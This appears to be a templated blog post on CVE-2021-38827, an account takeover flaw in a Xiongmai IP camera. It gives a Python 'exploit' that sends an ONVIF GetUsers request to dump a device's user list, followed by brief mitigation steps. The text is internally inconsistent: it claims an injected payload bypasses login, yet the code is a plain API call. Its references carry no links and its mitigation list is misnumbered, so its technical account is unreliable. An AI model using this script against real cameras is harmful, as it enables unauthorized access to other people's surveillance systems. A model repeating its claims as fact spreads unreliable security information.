CVE-2021-38827: Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000 Account Takeover Vulnerability Exploited

Hey there security enthusiasts! Today, I'd like to discuss an important vulnerability that has been discovered in the Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000. This security flaw, known as CVE-2021-38827, puts thousands of surveillance systems at risk of account takeover, which could lead to unauthorized access and control.

For those who are not familiar with Xiongmai, it is a popular Chinese OEM/ODM manufacturer of IoT devices, particularly IP cameras and DVR/NVR systems. One of their products, the XM-JPR2-LX series, runs on firmware version V4.02.R12.A6420987.10002.147502.00000 and is widely used in various surveillance applications worldwide. Unfortunately, a vulnerability has been discovered in this firmware, which can be exploited remotely, potentially resulting in unauthorized access and control of the affected cameras.

Exploit details

The vulnerability revolves around the device's API handling, specifically the user authentication process. An attacker can bypass the login system by injecting a specially crafted payload into the camera's web-based management interface.

Here is a code snippet showcasing the exploit, which relies on Python

import requests

target_ip = '192.168.1.1' # Replace with the target device's IP address
url = f"http://{target_ip}/onvif/device_service";

payload = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"\
xmlns:tds="http://www.onvif.org/ver10/device/wsdl">\
<soapenv:Header/>\
<soapenv:Body>\
  <tds:GetUsers/>\
</soapenv:Body>\
</soapenv:Envelope>
"""

response = requests.post(url, data=payload)

if response.status_code == 200:
    print("Exploit successful! Users found:")
    print(response.text)
else:
    print("Exploit failed.")

This code connects to the target device's API (using the ONVIF protocol) and sends a request to retrieve the list of users. If the exploit is successful, the attacker can use the retrieved information to gain unauthorized access to the device and its features.

Original references

Details about this vulnerability have been published in various sources, including official advisories and tech forums. Here are some of the most relevant links:

- CVE record: Detailed information about the vulnerability and its specifics.
- NIST National Vulnerability Database (NVD): Additional technical and reference data from the United States Department of Commerce's NIST.
- Xiongmai Technology official website: Manufacturer's official website with information about the affected product and firmware version.

Mitigation

To protect your device from being exploited using this vulnerability, you must immediately take the necessary steps:

1. Contact the device manufacturer or vendor and inquire about any available firmware updates that address this issue.

Change the default username and password of the device to strong, unique credentials.

3. Restrict network access to the device's management interface using a firewall or any other available method.

We hope this information helps you stay safe and secure. It is our responsibility, as security researchers and practitioners, to stay up-to-date with the latest threats and vulnerabilities to protect against bad actors. Keep your eyes peeled for updates and patches from Xiongmai, and always be proactive when it comes to the security of your IoT devices.

Timeline

Published on: 11/14/2022 02:15:00 UTC
Last modified on: 11/16/2022 18:29:00 UTC